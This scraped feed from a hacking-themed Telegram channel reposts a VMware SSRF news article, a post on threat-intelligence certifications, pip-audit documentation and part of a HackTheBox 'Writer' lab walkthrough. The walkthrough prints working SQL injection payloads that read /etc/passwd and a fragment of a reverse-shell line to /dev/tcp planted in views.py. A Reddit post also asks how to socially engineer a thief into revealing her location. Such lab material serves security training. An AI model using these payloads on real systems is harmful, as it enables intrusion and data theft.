Hacking Articles Tips Tricks Videos Tutorials
470 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Black Hat Ethical Hacking
SSRF vulnerability in VMWare authentication software could allow access to user data

https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/Untitled-design-2-1.png SSRF vulnerability in VMWare authentication software could allow access to user dataPost Views: 128 https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/BECOME-A-PATRON-AND-UNLOCK-EXCLUSIVE-VIDEOS-1.png Reading Time: 1 Minute
A server-side request forgery (SSRF) vulnerability in versions of VMWare authentication software could allow an attacker to obtain administrative JSON Web Tokens (JWT), researchers warn.
The SSRF bug was found in VMware Workspace ONE Access (previously known as Identity Manager), which provides multi-factor authentication, conditional access and single sign-on to SaaS, web, and native mobile apps.

The vulnerability (tracked as CVE-2021-22056), which was assigned a ‘moderate’ severity score of 5.5, could enable a malicious actor with network access to make HTTP requests to arbitrary origins and read the full response.

A blog post reads: “Due to the lack of a slash character, it is possible for an attacker to make HTTP requests to arbitrary origins and read the full response.

“Furthermore, an authorization header gets leaked and hence it is possible for an attacker to weaponize this vulnerability to steal the authorization header of an admin upon viewing an image or making a single click.”
See Also: Complete Offensive Security and Ethical Hacking Course Access all areasResearchers Shubham Shah and Keiran Sampson, who discovered the bug, said that this could lead to the leaking of JWTs – potentially allowing a malicious actor full access to a vulnerable system.

JWTs are URL safe strings that are used to identify a user. They contain JSON-encoded data, making them convenient for embedding information.

They are typically used as session identifiers for web applications, mobile applications, and API services. They also contain user data directly, unlike traditional session identifiers which simply point to user data on the server-side.

If a user’s JWTs are stolen or compromised, an attacker can potentially gain full access to the user’s account.

More information about the use of JWTs can be found here.

Researchers pointed out that the leaking of the JWT “increases the severity of the issue as this vulnerability can be used in spear phishing attacks against organizations that use VMWare Workspace One Access”.

Shah and Sampson, who discovered the bug, also found a second issue, an authentication bypass vulnerability in VMware Workspace ONE Access (CVE-2021-22057).

The vulnerability, impacting VMware Verify two factor authentication, was also rated as a moderate severity bug with a score of 6.6.

The security issue means a malicious actor who has successfully provided the first-factor in an authentication process (such as a password), may be able to obtain second-factor authentication provided by VMware Verify.

A security advisory contains further details about which versions of the software are at risk.
Are u a security researcher? Or a company that writes articles or write ups about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing?

If you want to express your idea in an article contact us here for a quote: info@blackhatethicalhacking.com
See Also: Microsoft: New critical Windows HTTP vulnerability is wormable Patch issuedVMWare has patched both security issues in its latest version of the enterprise software.

In their blog post, Shah and Sampson thanked the ven[...]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Black Hat Ethical Hacking SSRF vulnerability in VMWare authentication software could allow access to user data https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/Untitled-design-2-1.png SSRF vulnerability in VMWare authentication software could…
dor for their “serious” efforts to remediate the problem.

The researchers added: “Looking at this research as a whole, one the of the key takeaways is that the visibility into the exposure of enterprise software is often lacking or misunderstood by organizations that deploy this software.

“Many organizations disproportionately focus on in-house software and network issues at the expense of awareness and visibility into the exposure in the software developed by third parties.

“Our experience has shown that there continues to be significant vulnerabilities in widely deployed enterprise software that is often missed.”
See Also: Offensive Security Tool: Ivy See Also: Hacking stories – Rafael Núñez (aka RaFa), hacking NASA with the hacking group: World of Hell
Source: portswigger.net (Click Link)https://www.blackhatethicalhacking.com/wp-content/uploads/2021/11/Untitled-design.png Recent News* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/01/Safari-Apple-navigateur-90x90.jpg Same-origin violation vulnerability in Safari 15 could leak a user’s website history and identity1 day ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/01/Qlocker-Ransomware-1-90x90.png Qlocker ransomware returns – targets QNAP NAS devices worldwide2 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/01/https___specials-images.forbesimg.com_imageserve_61aff357a4c71fc225ab8ba7_0x0-90x90.jpg AWS fixes security flaws that exposed AWS customer data5 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/01/image-apple-releases-15-2-1-update-for-ios-and-ipados-to-fix-bugs-164203308032302-90x90.jpg Apple fixes doorLock bug that can disable iPhones and iPads6 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/01/0_Windows-headpic-90x90.jpg Microsoft: New critical Windows HTTP vulnerability is wormable1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/01/powerdir-exploit-microsoft-90x90.jpg Microsoft: powerdir bug gives access to protected macOS user data1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/01/using-npm-create-javascript-icon-libraries-90x90.png Dev corrupts NPM libs ‘colors’ and ‘faker’ breaking thousands of apps1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/01/ezgif.com-gif-maker-7-90x90.jpg Partially Unpatched VMware Bug Opens Door to Hypervisor Takeover2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/01/Apple-iPhone-13-Pro-90x90.png iOS malware can fake iPhone shut downs to snoop on camera, microphone2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/01/0358ad020c37-article-cache-poisoning-article-90x90.png Researcher discovers 70 web cache poisoning vulnerabilities, nets $40k in bug bounty rewards2 weeks ago
The post SSRF vulnerability in VMWare authentication software could allow access to user data first appeared on Black Hat Ethical Hacking.

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Top 5 Threat Intelligence Courses/Certifications

I started doing a little research a few weeks ago, looking at the best courses in the market for Penetration Testing, Incident Response and Threat Intelligence. I've been asking people across Reddit and other forums for their input.

1. FOR578 by SANS (Course + Exam)
2. CRTIA by CREST (Exam)
3. CPTIA by arcX + CREST (Course + Exam)
4. CCTIM by CREST (Exam)
5. CTIA by EC-Council (Course + Exam)

This has been impossible, hence top 5. The response to my requests for input on this also fell quiet pretty quickly but it was clear that CREST is one of the main providers of exams that come to mind when thinking CTI.

Firstly, I have to apologise wholeheartedly for the use of EC-Council in this list. I literally threw them on there as one person mentioned them, and they make the list up to 5. From personal experience, I would rather pick up a book than pay for any EC-Council cert (just my personal opinion).

As expected SANS are up there again, and having done this course a long time ago (employer paid for it) I can say that it was enjoyable for the most part.

arcX are a relatively new CREST training provider over in the UK, who by all accounts look after their veterans with nice discount (I like free and when not free, I like discount! Checkout code: 4AWQXXO4).

Unsurprisingly, I cant get my hands on any discount for SANS.

I find CREST to be an odd one on all my lists so far, as they provide really good exam syllabi (by all accounts) but very few training providers offer their courses.

As always, use your free resources where possible and research any course before spending your hard earned bucks on em.

Would you add any other courses/certs to this list?

r/cybersecuritytraining

submitted by /u/MoaningKnight
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
How do I text my scammer to find out where they live/meet up with me?

I live in Thailand and a girl basically drugged me and seduced me to going to my condo together. She ended up stealing $10k worth.

I reported it to the police, got all the security footage from my condo. But the police here are really slow and don't know where she is. They've basically forgotten my case and aren't responsive to me (after 3 days of this incident).

I have her LINE (basically a calling/texting app), and several (non-clear) photos of her. I am currently texting her from my friend's account as a disguise to find out where she lives/meet up with her via social engineering or any other means, and have the cops get her.

So far this thief added my friend, and asked "who are you". How should I proceed, with the goal of befriending her/getting her info/meeting up with her?

submitted by /u/legitpauls
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
pip-audit is a tool for scanning Python environments for packages with known vulnerabilities. It uses the Python Packaging Advisory Database (https://github.com/pypa/advisory-db) via the PyPI JSON API (https://warehouse.pypa.io/api-reference/json.html) as a source of vulnerability (https://www.kitploit.com/search/label/Vulnerability) reports. This project is developed by Trail of Bits (https://www.trailofbits.com/) with support from Google. This is not an official Google product.
Features Support for auditing local environments and requirements-style files Support for multiple vulnerability services (PyPI (https://warehouse.pypa.io/api-reference/json.html#known-vulnerabilities), OSV (https://osv.dev/docs/)) Support for emitting SBOMs (https://en.wikipedia.org/wiki/Software_bill_of_materials) in CycloneDX (https://cyclonedx.org/) XML or JSON Human and machine-readable output formats (columnar, JSON) Seamlessly reuses your existing local pip caches Installation pip-audit requires Python 3.6 or newer, and can be installed directly via pip: python -m pip install pip-audit Third-party packages In particular, pip-audit can be installed via conda: conda install -c conda-forge pip-audit Third-party packages are not directly supported by this project. Please consult your package manager's documentation for more detailed installation guidance. Usage You can run pip-audit as a standalone program, or via python -m: pip-audit --help
python -m pip_audit --help requirements file; this option can be used multiple times (default: None) -f FORMAT, --format FORMAT the format to emit audit results in (choices: columns, json, cyclonedx-json, cyclonedx-xml) (default: columns) -s SERVICE, --vulnerability-service SERVICE the vulnerability service to audit dependencies against (choices: osv, pypi) (default: pypi) -d, --dry-run collect all dependencies but do not perform the auditing step (default: False) -S, --strict fail the entire audit if dependency collection fails on any dependency (default: False) --desc [{on,off,auto}] include a description for each vulnerability; `auto` defaults to `on` for the `json` format. This flag has no effect on the `cyclonedx-json` or `cyclonedx-xml` formats. (default: auto) --cache-dir CACHE_DIR the directory (https://www.kitploit.com/search/label/Directory) to use as an HTTP cache for PyPI; uses the `pip` HTTP cache by default (default: None) --progress-spinner {on,off} display a progress spinner (default: on) --timeout TIMEOUT set the socket timeout (default: 15) --path PATHS restrict to the specified installation path for auditing packages; this option can be used multiple times (default: []) -v, --verbose give more output; this setting overrides the `PIP_AUDIT_LOGLEVEL` variable and is equivalent to setting it to `debug` (default: False)">usage: pip-audit [-h] [-V] [-l] [-r REQUIREMENTS] [-f FORMAT] [-s SERVICE]
[-d] [-S] [--desc [{on,off,auto}]] [--cache-dir CACHE_DIR]
[--progress-spinner {on,off}] [--timeout TIMEOUT]
[--path PATHS] [-v]

audit the Python environment for dependencies with known vulnerabilities

optional arguments:
-h, --help show this help message and exit
-V, --version show program's version number and exit
-l, --local show only results for dependencies in the local
environment (default: False)

___________________________
@hacking_Attack
@Hacking_Video
-f FORMAT, --format FORMAT
the format to emit audit results in (choices: columns,
json, cyclonedx-json, cyclonedx-xml) (default:
columns)
-s SERVICE, --vulnerability-service SERVICE
the vulnerability service to audit dependencies
against (choices: osv, pypi) (default: pypi)
-d, --dry-run collect all dependencies but do not perform the
auditing step (default: False)
-S, --strict fail the entire audit if dependency collection fails
on any dependency (default: False)
--desc [{on,off,auto}]
include a description for each vulnerability; `auto`
defaults to `on` for the `json` format. This flag has
no effect on the `cyclonedx-json` or `cyclonedx-xml`
formats. (default: auto)
--cache-dir CACHE_DIR
the directory to use as an HTTP cache for PyPI; uses
the `pip` HTTP cache by default (default: None)
--progress-spinner {on,off}
display a progress spinner (default: on)
--timeout TIMEOUT set the socket timeout (default: 15)
--path PATHS restrict to the specified installation path for
auditing packages; this option can be used multiple
times (default: [])
-v, --verbose give more output; this setting overrides the
`PIP_AUDIT_LOGLEVEL` variable and is equivalent to
setting it to `debug` (default: False)
Exit codes On completion, pip-audit will exit with a code indicating its status. The current codes are: 0: No known vulnerabilities (https://www.kitploit.com/search/label/Known%20Vulnerabilities) were detected. 1: One or more known vulnerabilities (https://www.kitploit.com/search/label/vulnerabilities) were found. Examples Audit dependencies for the current Python environment: $ pip-audit
No known vulnerabilities found
Audit dependencies for a given requirements file: $ pip-audit -r ./requirements.txt
No known vulnerabilities found
Audit dependencies for the current Python environment excluding system packages: $ pip-audit -r ./requirements.txt -l
No known vulnerabilities found
Audit dependencies when there are vulnerabilities present: $ pip-audit
Found 2 known vulnerabilities in 1 packages
Name Version ID Fix Versions
---- ------- -------------- ------------
Flask 0.5 PYSEC-2019-179 1.0
Flask 0.5 PYSEC-2018-66 0.12.3
Audit dependencies including descriptions: $ pip-audit --desc
Found 2 known vulnerabilities in 1 packages
Name Version ID Fix Versions Description
---- ------- -------------- ------------ -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ------------
Flask 0.5 PYSEC-2019-179 1.0 The Pallets Project Flask before 1.0 is affected by: unexpected memory usage. The impact is: denial of service. The attack vector is: crafted encoded JSON data. The fixed version is: 1. NOTE: this may overlap CVE-2018-1000656.
Flask 0.5 PYSEC-2018-66 0.12.3 The Pallets Project flask version Before 0.12.3 contains a CWE-20: Improper Input Validation vulnerability in flask that can result in Large amount of memory usage possibly leading to denial of service. This attack appear to be exploitable via Attacker provides JSON data in incorrect encoding. This vulnerability appears to have been fixed in 0.12.3. NOTE: this may overlap CVE-2019-1010083.

___________________________
@hacking_Attack
@Hacking_Video
Audit dependencies in JSON format: $ pip-audit -f json | jq
Found 2 known vulnerabilities in 1 packages
[
{
"name": "flask",
"version": "0.5",
"vulns": [
{
"id": "PYSEC-2019-179",
"fix_versions": [
"1.0"
],
"description": "The Pallets Project Flask before 1.0 is affected by: unexpected memory usage. The impact is: denial of service. The attack vector is: crafted encoded JSON data. The fixed version is: 1. NOTE: this may overlap CVE-2018-1000656."
},
{
"id": "PYSEC-2018-66",
"fix_versions": [
"0.12.3"
],
"description": "The Pallets Project flask version Before 0.12.3 contains a CWE-20: Improper Input Validation vulnerability in flask that can result in Large amount of memory usage possibly leading to denial of service. This attack appear to be exploitable via Attacker provides JSON data in incorrect encoding. This vu lnerability appears to have been fixed in 0.12.3. NOTE: this may overlap CVE-2019-1010083."
}
]
},
{
"name": "jinja2",
"version": "3.0.2",
"vulns": []
},
{
"name": "pip",
"version": "21.3.1",
"vulns": []
},
{
"name": "setuptools",
"version": "57.4.0",
"vulns": []
},
{
"name": "werkzeug",
"version": "2.0.2",
"vulns": []
},
{
"name": "markupsafe",
"version": "2.0.1",
"vulns": []
}
]
Security Model This section exists to describe the security assumptions you can and must not make when using pip-audit. TL;DR: If you wouldn't pip install it, you should not pip audit it. pip-audit is a tool for auditing Python environments for packages with known vulnerabilities. A "known vulnerability" is a publicly reported flaw in a package that, if uncorrected, might allow a malicious actor to perform unintended actions. pip-audit can protect you against known vulnerabilities by telling you when you have them, and how you should upgrade them. For example, if you have somepackage==1.2.3 in your environment, pip-audit can tell you that it needs to be upgraded to 1.2.4. You can assume that pip-audit will make a best effort to fully resolve all of your Python dependencies and either fully audit each or explicitly state which ones it has skipped, as well as why it has skipped them. pip-audit is not a static code analyzer. It analyzes dependency trees, not code, and it cannot guarantee that arbitrary dependency resolutions occur statically. To understand why this is, refer to Dustin Ingram's excellent post on dependency resolution in Python (https://dustingram.com/articles/2018/03/05/why-pypi-doesnt-know-dependencies/). As such: you must not assume that pip-audit will defend you against malicious packages. In particular, it is incorrect to treat pip-audit -r INPUT as a "more secure" variant of pip-audit. For all intents and purposes, pip-audit -r INPUT is functionally equivalent to pip install -r INPUT, with a small amount of non-security isolation to avoid conflicts with any of your local environments. Licensing pip-audit is licensed under the Apache 2.0 License. pip-audit reuses and modifies examples from resolvelib, which is licensed under the ISC license. Contributing See the contributing docs (https://github.com/trailofbits/pip-audit/blob/main/CONTRIBUTING.md) for details. Code of Conduct Everyone interacting with this project is expected to follow the PSF Code of Conduct (https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.md).

Download Pip-Audit (https://github.com/trailofbits/pip-audit)

___________________________
@hacking_Attack
@Hacking_Video
Extreme Hacking Mindset

How to dominate in bug bountiesContinue reading on Medium »
Read more...
Top 25 Server-Side Request Forgery (SSRF) Bug Bounty Reports

In this article, we will discuss the Server-Side Request Forgery (SSRF) vulnerability, and present 25 disclosed reports based on this flaw.Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles|Raj Chandel's Blog
Writer HackTheBox Walkthrough

Writer HackTheBox WalkthroughIntroductionWriter is a CTF Linux box with difficulty rated as “medium” on the HackTheBox platform. The machine covers SQL injection vulnerability and privilege escalation using SMTP.Table of ContentEnumeration· Directory enumeration to find admin pageExploitation· Exploiting UNION based SQLi to get essential information about python based webserverPrivilege Escalation· Escalating from www-data to Kyle by cracking hashes in databaseNetwork ScanningThe dedicated IP address of the machine is 10.10.91.172. We’ll run a nmap scan on this machine’s IP.nmap -A 10.129.170.230Open ports were:EnumerationThere was a website running on port 80gobuster dir -w /home/kali/seclists/Discovery/Web-Content/directory-list-2.3-medium.txtWe found an interesting directory called administrativeExploitationRight away we tried logging in using SQL injection payload uname=admin' union select 1,2,3,4,5,6 -- &password=adminhttps://blogger.googleusercontent.com/img/a/AVvXsEiAV7NQ9lBpTfOjvTZwgfWlcw1U4LJUdSee7wLhPDWAoMvE3XZ4fpPyOP4ZbZi7rzZXb4ZuBlFfpnoIOzxPLQWKWr2ZB0BkxrNj5O9APETz0w7V0NfTTNAQx9oFGl6ue0AIo1zWdx584pD42nuOgUEvTJcBnhuMAoR_WE3y9NPl0d_IQoiLyZTtStyqrw=s16000 We can see the active database’s name by changing the second column by database() in the payload. As you can see, the active database is “writer”uname=admin' union select 1,database(),3,4,5,6 -- &password=adminhttps://blogger.google[...]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Hacking Articles|Raj Chandel's Blog Writer HackTheBox Walkthrough Writer HackTheBox WalkthroughIntroductionWriter is a CTF Linux box with difficulty rated as “medium” on the HackTheBox platform. The machine covers SQL injection vulnerability and privilege…
usercontent.com/img/a/AVvXsEiU6cl5ly1H1bBaaP0HoyGFu3GFqoz3DtI72GHi9P8iDp1ag0G6-1igZNyJp99vKdZlY-wEtFsGS1fOxUXS3hpczUy-ZPBqnkChDtoc58mtclrv-krXIKEna-s0gDTlgPFxEgegXEOGylHRg3RigB3FdpWvzexgfdFmU950wVQ4nApaYbl1y1kKaP5tTA=s16000 Similarly, we can read the /etc/passwd file and try to learn what all users exists.uname=admin' union select 1,load_file("/etc/passwd"),3,4,5,6 -- &password=adminhttps://blogger.googleusercontent.com/img/a/AVvXsEiAyDpDEVcaXev2FIWhSSxrb6ZULX5txypAqQ2rhCQWnI3RZPxxIU8eN65TnY8NMHUqNnPsx6aHox-VOqYd23zwePKVP35jqjIWY05GlDp5rY8IF1730Fj97XordtHyJxqY1tbllL7V4aEAryqkfSTQbNEP-fI4BrPXMoDcHperohGCl04tRTezsZK2ow=s16000 This gave us an insight into the system. It of course was running Apache web server so we looked at 000-default.conf file that includes absolute path of the website. Here, we found a wsgi present which means that a python based webserver (Django or Flask) was running on the webserver.uname=admin' union select 1,load_file("/etc/apache2/sites-enabled/000-default.conf"),3,4,5,6 -- &password=adminsmbmap -H 10.129.170.230 -u "kyle" -p "ToughPasswordToCrack"https://blogger.googleusercontent.com/img/a/AVvXsEiLNZ2KoP621-LYKBscYWircW9uAs3gq2AYY1V5S0JH5_MML_aSrWe1zCNpDIQp8hESp4ajefacrvaophZTEiA0yHjiixufGmG1xmPFAZvYJGzIoSwYumFtyDxqLI8p7WnxxOgrzoo-O2NR7gB8NA6My2pC7eGO4XqVNwmmXFNwrSGP13-etvUHGB1N5w=s16000 Logically, whatever is in views.py should be rendered by the website. Hence, if we add a simply python one liner, it would be rendered by the website too. That’s precisely what we did. We added the following code in views.pyimport os& /dev/tcp/10.10.14.104/1234 0>&1"')https://blogger.googleusercontent.com/img/a/AVvXsEiqoTz-nxKnLTm5okqOMeVDFMKwZ49jbbsbdpwQEVTIkvbP37pZKVwIwtjHlkMmrMiK8038JsLGqbVGYja70DHhauAkU_FgWuXgmXGgJeN6qWiKzxyzNvUsagxqFDxg6dTfuysZhn1gxW4n3p62aGS1GbhYnIm_b3inoaKJLYQcz7vvRZnM6D0PKakt6w=s16000 Thereafter, we replaced this views.py with the original one using put command in the SMB share___________________________
@hacking_Attack
@Hacking_Video